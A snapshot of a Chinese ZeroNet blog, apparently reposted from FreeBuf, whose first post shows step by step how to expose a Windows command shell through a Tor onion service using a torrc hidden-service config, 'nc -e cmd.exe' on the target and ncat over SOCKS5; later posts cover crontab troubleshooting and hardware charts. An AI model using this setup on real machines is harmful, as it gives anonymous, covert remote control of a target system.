? Editing: Post:21.body Save Delete Cancel
Content changed Sign & Publish new content

🐍

欢迎来访我的ZeroBlog

Follow in NewsfeedFollowing

Latest comments:

看我如何通过Tor Onion在Windows中执行远程Shell

on Feb 23, 2018


在这篇文章中,我将跟大家分享我的一个小发现,即如何在Windows平台中通过Tor Onion服务来开启远程Shell 。接下来,话不多说,我们直奔主题。

1.png

## 操作方法

首先,我们要在一个Windows Tor客户端中创建一个Tor onion服务(即隐藏服务)。我下载了Tor Expert bundle(同样适用于Tor浏览器)-【下载地址】。

然后使用下列命令创建Tor配置文件torrc:

HiddenServiceDir C:\demo\Tor\service HiddenServicePort 8662 127.0.0.1:12345

开启Tor服务之后,将会自动创建目录C:\demo\Tor\Service,并填充一系列必要的文件(<主机名>文件夹包含了这个Toronion服务的.onion地址)。

该onion服务将监听端口8662,而流量将会直接转发到127.0.0.1(端口12345)。

这里我们还可以给服务开启客户端验证功能,因为如果不开启这个功能的话,任何知道这个.onion地址和端口号的人都可以进行连接。最基础的客户端验证使用了共享密钥,你可以使用下列命令进行配置(torrc):

HiddenServiceAuthorizeClient basic testuser

这里我选择使用testuser作为客户端名称:

2.png

接下来,我们可以使用配置文件torrc来开启Tor:

tor.exe -f torrc

3.png

4.png

.onion地址以及客户端验证cookie可以在service目录的<主机名>文件夹中找到:

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

当然了,你一定要保护认证cookie密钥的安全。

现在,用nc.exe在目标Windows设备上开启服务(我几年前就在电脑上下载了nc.exe,我不记得原始的URL地址了,我使用的版本是v1.11,MD5为ab41b1e2db77cebd9e2779110ee3915d):

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

5.png

Tor ExpertBundle以及nc.exe不需要任何其他的依赖组件(跟DLL类似),因此任意用户都可以直接运行。

现在我们的目标主机已经配置好了,在另一台设备上,我需要使用包含了认证cookie的配置文件来开启Tor服务:

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

6.png

接下来,我们需要运行ncat,因为ncat.exe支持socks5代理(nc.exe不支持):

ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662

接下来,我们就得到远程Shell啦!

7.png

提醒大家一下,这种方法不适用于ncat v 7.60版本,具体原因请参考【这里】:

ibnsock select_loop(): nsock_loop error 10038: An operation was attempted on somethingthat is not a socket.

8.png

* 参考来源:didierstevens,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

Read more

crontab 定时任务不执行的常见解决方法

on Feb 23, 2018

crontab定时任务不执行问题

排查原因步骤如下:

首先,确认服务器是否开启定时任务计划服务,只有root用户才能对crond服务进行开启和关闭

[root@mimvp-bj script]# service crond status
crond is stopped
[root@mimvp-bj script]# service crond start
Starting crond: [ OK ]
[root@mimvp-bj script]#
service crond status
crond (pid 24577) is running…

请确保crond状态为 is running…

如果crond状态为 crond is stopped ,则定时任务服务不会生效故无法执行,我遇到的crontab不执行就是这个原因

crontab 常见错误的几个问题

编辑 crontab :
crontab -e

(指定bash是非常有效的解决方式,我今天碰到这个问题,死活执行不起来,后台调试过程中添加了这一句就解决了)

# minute hour day month week command
SHELL=/bin/bash
30 cd /home/barry/top800/top10/top10_fruits/ && ./top10_all.sh

Ctrl + O (写入)——》 Enter键(保存文件名)——》 Ctrl + X(退出)

输入查看命令:

crontab -l

# m h dom mon dow command
SHELL=/bin/bash
30 cd /home/barry/top800/top10/top10_fruits/ && ./top10_all.sh
推荐用此方式

如果遇到shell语法错误

解决方法:

需指定shell解释器命令:SHELL=/bin/bash(请参见上面 crontab编辑示例 SHELL=/bin/bash

或者参见: LINUX – BASH Syntax Error

如果遇到路径错误

在 /var/spool/crontab/yanggang 中,添加了如下命令,在日志文件 /var/spool/mail/yanggang 中提示找不到 xxx.sh 路径

30 /home/barry/top800/top10/top10_fruits/top10_all.sh

30 bash /home/barry/top800/top10/top10_fruits/top10_all.sh

这是因为你在crontab中使用了绝对路径执行脚本 top10_all.sh,因此在脚本 top10_all.sh 中引用的其它脚本也都需要使用绝对路径,才能被crontab找到并执行。

那么该如何避免绝对路径呢,推荐采用如下格式:

30 cd /home/barry/top800/top10/top10_fruits/ && ./top10_all.sh推荐用此方式

先进入该目录,然后在执行脚本;否则,执行脚本中的其它脚本都需要加绝对路径

一些示例:

00 8,12,16 * /data/app/scripts/monitor/df.sh

30 2 * /data/app/scripts/hotbackup/hot_database_backup.sh

10 8,12,16 * /data/app/scripts/monitor/check_ind_unusable.sh

10 8,12,16 * /data/app/scripts/monitor/check_maxfilesize.sh

10 8,12,16 * /data/app/scripts/monitor/check_objectsize.sh

43 21 * 21:43 执行

15 05 *    05:15 执行

0 17 * 17:00 执行

0 17 1 每周一的 17:00 执行

0,10 17 0,2,3 每周日,周二,周三的 17:00 17:10 执行

0-10 17 1 毎月1日从 17:007:10 毎隔1分钟 执行

0 0 1,15 * 1 毎月1日和 15日和 一日的 0:00 执行

42 4 1     毎月1日的 4:42 执行

0 21 1-6   周一到周六 21:00 执行

0,10,20,30,40,50  每隔10 执行

/10 *        每隔10 执行

1          1:01:59 每隔1分钟 执行

0 1 *         1:00 执行

0 /1         毎时0 每隔1小时 执行

0          毎时0 每隔1小时 执行

2 8-20/3 *      8:02,11:02,14:02,17:02,20:02 执行

30 5 1,15        1 15日的 5:30 执行

Read more

网线线序

on Feb 22, 2018

link.jpg (511x350)

Read more

桌面显卡性能天梯图

on Feb 22, 2018

__.jpg (308x900)

Read more
Add new post

Title

21 hours ago · 2 min read ·
3 comments
Body
Read more

Not found

Title

21 hours ago · 2 min read

0 Comments:

user_name1 day ago
Reply
Body
This page is a snapshot of ZeroNet. Start your own ZeroNet for complete experience. Learn More